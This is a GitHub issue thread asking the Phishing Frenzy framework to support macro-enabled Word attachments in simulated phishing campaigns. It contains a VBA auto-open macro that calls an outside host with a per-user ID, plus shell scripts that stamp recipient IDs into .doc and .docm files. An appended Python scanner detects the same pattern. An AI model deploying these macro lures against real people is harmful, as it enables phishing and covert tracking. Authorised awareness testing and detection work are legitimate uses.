
Manage Office document with macro

Open fraf0 opened this issue 8 years ago • 2 comments

Hi,

I would like to be able to send an Office document (Word, Excel) with a macro in a simulated phishing campaign. To be able to follow the user's actions, the macro must include the user ID.

If I do it "by hand", I do it like this:

  • Create a Word document with the macro, with "_usrid" in place of the user ID.
  • Manipulate the document to replace _usrid by the real one:
    • With the 97-2003 file type: just replace the string in binary mode
    • With the 2007+ file type: uncompress the file, modify the content and regenerate an Office file
  • Attach the right file to each email (by user ID)

In the Phishing Frenzy framework, I see two ways:

  • Generate the document outside the framework and reference the attachment by the user ID, or
  • Be able to manipulate the Office document directly inside the framework, based on a template

Technical details:

VBA macro:

Private Sub Document_Open()
    Dim HttpReq As Object
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    HttpReq.Open "GET", "http://requestb.in/xvdaudxv?usrid=__usrid_", False
    HttpReq.send
    XmlHttpRequest = HttpReq.responseText
    MsgBox HttpReq.responseText + Str(HttpReq.Status)
End Sub
  • 97-2003 file type

# binary .doc: the placeholder __usrid_ has the same length (8 characters) as the
# user IDs that replace it, so the file keeps its size after the substitution
for i in AFWTTLFQ JCJGQZVF
  do
    sed -e "s/__usrid_/${i}/" Coucou.doc > Coucou_${i}.doc
  done

  • 2007+ file type

# OOXML .docm: unpack the zip, patch the placeholder inside the VBA part, repack
for i in AFWTTLFQ JCJGQZVF
  do
    mkdir ${i}
    cd ${i}
    7z x ../Coucou.docm
    sed -i -e "s/__usrid_/${i}/" word/vbaProject.bin
    zip -r ../Coucou_${i}.docm *
    cd ..
    rm -rf ${i}
  done

The zip manipulation transforms the Office document into an OOXML file according to file:

file Coucou*
  Coucou_AFWTTLFQ.docm: Microsoft OOXML
  Coucou.docm:          Microsoft Word 2007+
  Coucou_JCJGQZVF.docm: Microsoft OOXML

But Word opens it without any problem.

Regards, fraf

fraf0, Sep 26 '16 14:09

Hi, @fraf0, is this just an idea or does it actually work?

RatedRR, Apr 11 '17 14:04

Hi, it works but is not integrated into Phishing Frenzy. In addition to my first post, you must deal with Unicode, for example:

# build the UTF-16 form of the user ID by putting a NUL byte before each character
# (GNU sed needs \( \) for the group, otherwise \1 is an invalid reference)
usrid_uni=$(echo -n ${usrid} | sed -e 's/\(.\)/\x00\1/g')
# replace the plain-text placeholder
sed -i -e "s/usrid_________________________________/${usrid}/g" "by_usrid/${usrid}/doc.doc"
# replace the UTF-16 placeholder with the UTF-16 user ID
sed -i -e "s/\x00_\x00u\x00s\x00r\x00i\x00d\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_/${usrid_uni}/g" "by_usrid/${usrid}/doc.doc"

It would be even better to use iconv -t unicodebig instead of sed to generate the Unicode format :)

fraf0, Apr 21 '17 10:04
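A defender-side check for the two attachment formats discussed in this thread, added here as an example and not part of Phishing Frenzy or the poster's scripts: it classifies a Word file, flags macro content (word/vbaProject.bin in a 2007+ package, a Macros storage in a 97-2003 file) and pulls URLs out of the VBA blob whether they are stored as plain bytes or in the NUL-interleaved UTF-16 form the second post patches with sed. The sample inputs are constructed inside the block, and the Macros storage test and the entry-order note are simplifying assumptions, not a full OLE or libmagic parser.

```python
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"        # 97-2003 compound file header
BEACON = "http://requestb.in/xvdaudxv?usrid=__usrid_"   # tracking URL from the issue
URL_RE = re.compile(r"https?://[\x21-\x7e]+")           # run of printable ASCII

def find_urls(raw: bytes) -> set:
    """URLs stored as plain bytes or as UTF-16 anywhere in a blob."""
    # latin-1 maps bytes 1:1; decoding as both UTF-16-LE and UTF-16-BE covers a
    # UTF-16 string at either byte alignment, wherever it lands in the file
    found = set(URL_RE.findall(raw.decode("latin-1")))
    for enc in ("utf-16-le", "utf-16-be"):
        found.update(URL_RE.findall(raw.decode(enc, errors="ignore")))
    return found

def scan_word_file(data: bytes) -> dict:
    """Classify a Word file, flag macro content and list URLs in the VBA blob."""
    report = {"format": "unknown", "has_macro": False, "urls": set(), "entries": []}
    if data.startswith(OLE_MAGIC):
        report["format"] = "word-97-2003"
        # assumption: a macro-enabled .doc has a 'Macros' storage (name is UTF-16-LE)
        report["has_macro"] = "Macros".encode("utf-16-le") in data
        report["urls"] = find_urls(data)
    elif data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as pkg:
            names = pkg.namelist()
            report["format"] = "ooxml" if "[Content_Types].xml" in names else "zip"
            report["entries"] = names[:3]   # entry order is what `file` inspects
            vba = [n for n in names if n.lower().endswith("vbaproject.bin")]
            report["has_macro"] = bool(vba)
            for name in vba:
                report["urls"] |= find_urls(pkg.read(name))
    # query-string parameter names reveal per-recipient tracking (usrid=...)
    report["params"] = {kv.split("=")[0] for u in report["urls"] if "?" in u
                        for kv in u.split("?", 1)[1].split("&")}
    return report

def sample_docm() -> bytes:   # constructed .docm-like package, beacon in the VBA part
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("docProps/app.xml", "<Properties/>")
        pkg.writestr("word/vbaProject.bin", b"\x00" * 16 + BEACON.encode() + b"\x00")
    return buf.getvalue()

def sample_doc() -> bytes:    # constructed 97-2003-style bytes, UTF-16 URL at an odd offset
    return (OLE_MAGIC + b"\x00" * 24 + "Macros".encode("utf-16-le") + b"\x00"
            + BEACON.encode("utf-16-le") + b"\x00\x00")
```

Running scan_word_file over a mail gateway's attachment queue gives a quick triage signal: macro present plus a URL with a per-recipient query parameter is exactly the pattern this thread describes.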